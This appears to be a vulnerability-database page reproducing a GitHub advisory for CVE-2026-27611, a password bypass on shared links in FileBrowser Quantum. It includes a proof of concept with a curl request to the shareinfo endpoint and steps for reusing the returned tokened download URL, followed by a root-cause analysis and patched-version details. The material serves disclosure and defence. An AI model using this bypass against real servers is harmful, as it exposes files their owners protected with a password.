6.5

CVSS Score

3.1

-

CVSS Score

Basic Information

Concerned about an active attack path?

Talk to our security experts and see Miggo in action.

Miggo Vulnerability Database

→

CVE-2026-27611

CVE-2026-27611: FileBrowser Quantum: Password Protection Not Enforced on Shared File Links

Summary

When users share password-protected files, the recipient can completely bypass the password and still download the file.

Details

This happens because the API returns a direct download link in the details of the share, which is accessible to anyone with JUST THE SHARE LINK, even without the password.

PoC

As an authenticated user, create a share for a file, with a password specified in "Optional password" (make sure to allow anonymous access as the PoC doesn't explain how to do this on a share that requires login, but it is also possible to do on a share that requires login, with some small tweaks to the API request)
Copy the first link (the clipboard WITHOUT an arrow) because the second one just completely skips the password without any effort required, which was mentioned in another vulnerability (https://github.com/filebrowser/filebrowser/security/advisories/GHSA-3v48-283x-f2w4)

Now, the link that was copied should look like: https://yourdomain/public/share/yoursharehash example: https://example.com/public/share/ngCZzArOyFHUQBmfbvP-pA

Now, make a API request with any api client to GET https://yourdomain/public/api/shareinfo?hash=(the share hash from the link) example: https://example.com/public/api/shareinfo?hash=ngCZzArOyFHUQBmfbvP-pA

If curl is preferred, a (command line based API client), here's the command: curl 'https://yourdomain/public/api/shareinfo?hash=yoursharehash' -H 'Accept: */*' example: curl 'https://example.com/public/api/shareinfo?hash=ngCZzArOyFHUQBmfbvP-pA' -H 'Accept: */*'

Example response:

{
    "shareTheme": "default",
    "title": "Shared files - IMG_20240814_213703451.jpg",
    "description": "A share has been sent to you to view or download.",
    "disableSidebar": false,
    "source": "/folder",
    "path": "/IMG_20240814_213703451.jpg/",
    "downloadURL": "https://example.com/public/api/raw?hash=ngCZzArOyFHUQBmfbvP-pA\u0026token=uEr4nCNarX6FqlzwmBo8X1rRRASbOrMY.sWSARcKhrVKrEJlqiF-l6RjXK9fMEPYZsMc9DCJ96BQ%3D",
    "shareURL": "https://example.com/public/share/ngCZzArOyFHUQBmfbvP-pA",
    "enforceDarkLightMode": "default",
    "viewMode": "normal",
    "shareType": "normal",
    "sidebarLinks": [
        {
            "name": "Share QR Code and Info",
            "category": "shareInfo",
            "target": "#",
            "icon": "qr_code"
        },
        {
            "name": "Download",
            "category": "download",
            "target": "#",
            "icon": "download"
        }
    ],
    "hasPassword": true
}

Look at the downloadURL. It encodes the "&" symbol as "\u0026" so just replace "\u0026" with "&", example: https://example.com/public/api/raw?hash=ngCZzArOyFHUQBmfbvP-pA\u0026token=uEr4nCNarX6FqlzwmBo8X1rRRASbOrMY.sWSARcKhrVKrEJlqiF-l6RjXK9fMEPYZsMc9DCJ96BQ%3D should be changed to: https://example.com/public/api/raw?hash=ngCZzArOyFHUQBmfbvP-pA&token=uEr4nCNarX6FqlzwmBo8X1rRRASbOrMY.sWSARcKhrVKrEJlqiF-l6RjXK9fMEPYZsMc9DCJ96BQ%3D

Then just copy paste the new link (example: https://example.com/public/api/raw?hash=ngCZzArOyFHUQBmfbvP-pA&token=uEr4nCNarX6FqlzwmBo8X1rRRASbOrMY.sWSARcKhrVKrEJlqiF-l6RjXK9fMEPYZsMc9DCJ96BQ%3D) into any browser, and the file will download. All without giving a password.

Impact

This affects anyone who shares password-protected files.

(GitHub Advisory)

Miggo Vulnerability Database

→

CVE-2026-27611

CVE-2026-27611:

6.5

CVSS Score

3.1

-

CVSS Score

Basic Information

Is this CVE running in your environment?

Easily map the attack path and prioritize which CVEs are a threat to your organization

Validate Exposure

Technical Details

Package Name	Ecosystem	Vulnerable Versions	First Patched Version
github.com/gtsteffaniak/filebrowser/backend	go	< 0.0.0-20260221163904-dbcfba993b85	0.0.0-20260221163904-dbcfba993b85

Technical Details

Vulnerability Intelligence
Miggo AI

Root Cause Analysis

The vulnerability allows bypassing password protection on shared files. The root cause is the shareInfoHandler function, which services the /public/api/shareinfo endpoint. This function fetches share data, including a direct download URL with a valid token, and returns it to the user. Crucially, it fails to check if the share is password-protected before exposing the download link. Consequently, an attacker can make an unauthenticated request to this public endpoint and receive the direct download link, circumventing the password protection entirely. The provided commits refactor the code by moving the vulnerable function but do not contain the actual fix, which would involve adding a password check and redacting the download URL for protected shares when the password is not provided.

Vulnerable functions

http.shareInfoHandler

backend/http/share.go

The function `shareInfoHandler` is responsible for handling the `/public/api/shareinfo` endpoint. It retrieves share information, including a direct download URL with a valid token, using the share's hash. The vulnerability lies in the fact that this function returns the complete share information, including the `downloadURL`, without checking if the share is password-protected. This allows an attacker to obtain a direct download link for any file, bypassing password protection, by simply querying the public API with the share hash.

Vulnerability Intelligence
Miggo AI

Unlock WAF rules for this CVE

Generate vendor-ready rules for the observed attack patterns, plus reasoning and safe deployment guidance

Get WAF rules

WAF Protection Rules

WAF Rule

W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.

Reasoning

*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.

6.5

-

Basic Information

Basic Information

Concerned about an active attack path?

CVE-2026-27611: FileBrowser Quantum: Password Protection Not Enforced on Shared File Links

Summary

Details

PoC

Impact

CVE-2026-27611:

6.5

-

Basic Information

Basic Information

Is this CVE running in your environment?

Technical Details

Technical Details

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

Vulnerability IntelligenceMiggo AI

Unlock WAF rules for this CVE

WAF Protection Rules

WAF Rule

Reasoning

Basic Information

Basic Information

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

Technical Details

6.5

6.5

CVE-2026-27611: FileBrowser Quantum: Password Protection Not Enforced on Shared File Links

Summary

Details

PoC

Impact

Vulnerability Intelligence
Miggo AI

Vulnerability Intelligence
Miggo AI

Vulnerability Intelligence
Miggo AI